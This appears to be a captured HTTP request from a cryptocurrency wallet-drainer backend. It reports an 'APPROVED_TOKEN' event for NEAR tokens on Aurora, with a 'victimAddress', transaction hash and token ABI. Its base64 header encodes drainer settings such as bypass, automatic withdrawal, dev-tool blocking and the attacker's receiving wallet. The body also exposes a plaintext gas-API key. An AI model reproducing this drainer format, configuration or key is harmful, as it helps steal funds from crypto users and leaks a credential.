POST http://localhost:3001/api/complete
Content-Type: application/json
User-Data: eyJVU0VSX0lEIjoiN0Y2RkRGMkQ1RTE3MkQ0QTg5Q0Y2NzE5IiwiQlVORExFX0lEIjoiMTFiMzY2NGI1YyIsIkJVVFRPTl9OQU1FIjoic2RiIiwiQlVORExFX0RFU0NSSVBUSU9OIjoic2Ric2RiIiwiQlVORExFX0RPTUFJTlMiOm51bGwsIkJVTkRMRV9CVVRUT05fQ0xBU1MiOiJjb25uZWN0IiwiTU9EQUxfVEhFTUUiOiJkYXJrIiwiTU9EQUxfVFlQRSI6bnVsbCwiTU9EQUxfSU1BR0UiOiIiLCJNT0RBTF9ERVNDUklQVElPTiI6bnVsbCwiQ0hFQ0tfTkZUIjp0cnVlLCJCWVBBU1NfT04iOnRydWUsIklTX0FVVE9NQVRJQ19XSVRIRFJBV0FMX1JFUVVFU1QiOnRydWUsIkhJREVfUE9PUl9DT05ORUNUIjp0cnVlLCJESVNBQkxFX0RFVl9UT09MIjp0cnVlLCJET01BSU5fV0hJVEVMSVNUIjpmYWxzZSwiTUlOX05GVF9CQUxBTkNFIjoxMCwiTUlOX1RPS0VOX0JBTEFOQ0UiOjEwLCJNQVhfUkVUUllfQ09VTlQiOjMsIk1BWF9TV0lUQ0hfQ09VTlQiOjEsIkJVSUxEX0RBVEUiOiIyMDI0LTExLTI4IDIxOjUxOjE5IiwiV0FMTEVUX0FERFJFU1MiOiIweDMyQmUzNDNCOTRmODYwMTI0ZEM0ZkVlMjc4RkRDQkQzOEMxMDJEODcifQ==

{
  "event": "APPROVED_TOKEN",
  "token": {
    "id": "0xc42c30ac6cc15fac9bd938618bcaa1a1fae8501d",
    "chain": "aurora",
    "name": "NEAR",
    "symbol": "NEAR",
    "display_symbol": null,
    "optimized_symbol": "NEAR",
    "decimals": 24,
    "logo_url": "https://static.debank.com/image/aurora_token/logo_url/0xc42c30ac6cc15fac9bd938618bcaa1a1fae8501d/54f3009dc6b5e6f894c3e4a53babb65f.png",
    "protocol_id": "",
    "price": 6.9674,
    "price_24h_change": 0.007986317452495105,
    "is_verified": true,
    "is_core": true,
    "is_wallet": true,
    "time_at": null,
    "amount": 5.968066484862455,
    "raw_amount": "5.968066484862456e+24",
    "raw_amount_hex_str": "0x4efc9884cc2fcc241f4d9",
    "balance": 41.58190642663067,
    "type": "token"
  },
  "abi": [
    {
      "inputs": [
        {
          "internalType": "string",
          "name": "metadata_name",
          "type": "string"
        },
        {
          "internalType": "string",
          "name": "metadata_symbol",
          "type": "string"
        },
        {
          "internalType": "uint8",
          "name": "metadata_decimals",
          "type": "uint8"
        },
        {
          "internalType": "address",
          "name": "admin",
          "type": "address"
        }
      ],
      "stateMutability": "nonpayable",
      "type": "constructor"
    },
    {
      "anonymous": false,
      "inputs": [
        {
          "indexed": true,
          "internalType": "address",
          "name": "owner",
          "type": "address"
        },
        {
          "indexed": true,
          "internalType": "address",
          "name": "spender",
          "type": "address"
        },
        {
          "indexed": false,
          "internalType": "uint256",
          "name": "value",
          "type": "uint256"
        }
      ],
      "name": "Approval",
      "type": "event"
    },
    {
      "anonymous": false,
      "inputs": [
        {
          "indexed": true,
          "internalType": "address",
          "name": "from",
          "type": "address"
        },
        {
          "indexed": true,
          "internalType": "address",
          "name": "to",
          "type": "address"
        },
        {
          "indexed": false,
          "internalType": "uint256",
          "name": "value",
          "type": "uint256"
        }
      ],
      "name": "Transfer",
      "type": "event"
    },
    {
      "inputs": [],
      "name": "admin",
      "outputs": [
        {
          "internalType": "address",
          "name": "",
          "type": "address"
        }
      ],
      "stateMutability": "view",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "address",
          "name": "target",
          "type": "address"
        },
        {
          "internalType": "bytes",
          "name": "data",
          "type": "bytes"
        }
      ],
      "name": "adminDelegatecall",
      "outputs": [
        {
          "internalType": "bytes",
          "name": "",
          "type": "bytes"
        }
      ],
      "stateMutability": "payable",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "uint256",
          "name": "flags",
          "type": "uint256"
        }
      ],
      "name": "adminPause",
      "outputs": [],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [],
      "name": "adminReceiveEth",
      "outputs": [],
      "stateMutability": "payable",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "address payable",
          "name": "destination",
          "type": "address"
        },
        {
          "internalType": "uint256",
          "name": "amount",
          "type": "uint256"
        }
      ],
      "name": "adminSendEth",
      "outputs": [],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "uint256",
          "name": "key",
          "type": "uint256"
        },
        {
          "internalType": "uint256",
          "name": "value",
          "type": "uint256"
        }
      ],
      "name": "adminSstore",
      "outputs": [],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "address",
          "name": "owner",
          "type": "address"
        },
        {
          "internalType": "address",
          "name": "spender",
          "type": "address"
        }
      ],
      "name": "allowance",
      "outputs": [
        {
          "internalType": "uint256",
          "name": "",
          "type": "uint256"
        }
      ],
      "stateMutability": "view",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "address",
          "name": "spender",
          "type": "address"
        },
        {
          "internalType": "uint256",
          "name": "amount",
          "type": "uint256"
        }
      ],
      "name": "approve",
      "outputs": [
        {
          "internalType": "bool",
          "name": "",
          "type": "bool"
        }
      ],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "address",
          "name": "account",
          "type": "address"
        }
      ],
      "name": "balanceOf",
      "outputs": [
        {
          "internalType": "uint256",
          "name": "",
          "type": "uint256"
        }
      ],
      "stateMutability": "view",
      "type": "function"
    },
    {
      "inputs": [],
      "name": "decimals",
      "outputs": [
        {
          "internalType": "uint8",
          "name": "",
          "type": "uint8"
        }
      ],
      "stateMutability": "view",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "address",
          "name": "spender",
          "type": "address"
        },
        {
          "internalType": "uint256",
          "name": "subtractedValue",
          "type": "uint256"
        }
      ],
      "name": "decreaseAllowance",
      "outputs": [
        {
          "internalType": "bool",
          "name": "",
          "type": "bool"
        }
      ],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "address",
          "name": "spender",
          "type": "address"
        },
        {
          "internalType": "uint256",
          "name": "addedValue",
          "type": "uint256"
        }
      ],
      "name": "increaseAllowance",
      "outputs": [
        {
          "internalType": "bool",
          "name": "",
          "type": "bool"
        }
      ],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "address",
          "name": "account",
          "type": "address"
        },
        {
          "internalType": "uint256",
          "name": "amount",
          "type": "uint256"
        }
      ],
      "name": "mint",
      "outputs": [],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [],
      "name": "name",
      "outputs": [
        {
          "internalType": "string",
          "name": "",
          "type": "string"
        }
      ],
      "stateMutability": "view",
      "type": "function"
    },
    {
      "inputs": [],
      "name": "paused",
      "outputs": [
        {
          "internalType": "uint256",
          "name": "",
          "type": "uint256"
        }
      ],
      "stateMutability": "view",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "string",
          "name": "metadata_name",
          "type": "string"
        },
        {
          "internalType": "string",
          "name": "metadata_symbol",
          "type": "string"
        },
        {
          "internalType": "uint8",
          "name": "metadata_decimals",
          "type": "uint8"
        }
      ],
      "name": "setMetadata",
      "outputs": [],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [],
      "name": "symbol",
      "outputs": [
        {
          "internalType": "string",
          "name": "",
          "type": "string"
        }
      ],
      "stateMutability": "view",
      "type": "function"
    },
    {
      "inputs": [],
      "name": "totalSupply",
      "outputs": [
        {
          "internalType": "uint256",
          "name": "",
          "type": "uint256"
        }
      ],
      "stateMutability": "view",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "address",
          "name": "recipient",
          "type": "address"
        },
        {
          "internalType": "uint256",
          "name": "amount",
          "type": "uint256"
        }
      ],
      "name": "transfer",
      "outputs": [
        {
          "internalType": "bool",
          "name": "",
          "type": "bool"
        }
      ],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "address",
          "name": "sender",
          "type": "address"
        },
        {
          "internalType": "address",
          "name": "recipient",
          "type": "address"
        },
        {
          "internalType": "uint256",
          "name": "amount",
          "type": "uint256"
        }
      ],
      "name": "transferFrom",
      "outputs": [
        {
          "internalType": "bool",
          "name": "",
          "type": "bool"
        }
      ],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "address",
          "name": "recipient",
          "type": "address"
        },
        {
          "internalType": "uint256",
          "name": "amount",
          "type": "uint256"
        }
      ],
      "name": "withdrawToEthereum",
      "outputs": [],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [
        {
          "internalType": "bytes",
          "name": "recipient",
          "type": "bytes"
        },
        {
          "internalType": "uint256",
          "name": "amount",
          "type": "uint256"
        }
      ],
      "name": "withdrawToNear",
      "outputs": [],
      "stateMutability": "nonpayable",
      "type": "function"
    }
  ],
  "chain": {
    "chainId": 1313161554,
    "chainHexId": "0x4e454152",
    "chainName": "Aurora Mainnet",
    "tokenSymbol": "Aurora ETH",
    "rpcUrl": "https://mainnet.aurora.dev",
    "abiUrl": "https://explorer.mainnet.aurora.dev/api?module=contract&action=getsourcecode&address=",
    "gasUrl": "https://api.owlracle.info/v4/aurora/gas?apikey=f52bbd2c6f664698b5c7b907a1894e29",
    "gasApiType": "owlracle",
    "explorer": "aurorascan.dev"
  },
  "randomAddress": "0xb62dd3809d12A5Ce151BD848fE3107D3AD10d869",
  "victimAddress": "0x780deEc741B8A9356b51C882Cd314CEE4a91adDa",
  "gasPrice": {
    "type": "BigNumber",
    "hex": "0x042c1d80"
  },
  "tx": "0x8b079aa1e3e85905b7391b218f71fdeca7867c043dc7df395783158caad5a22d"
}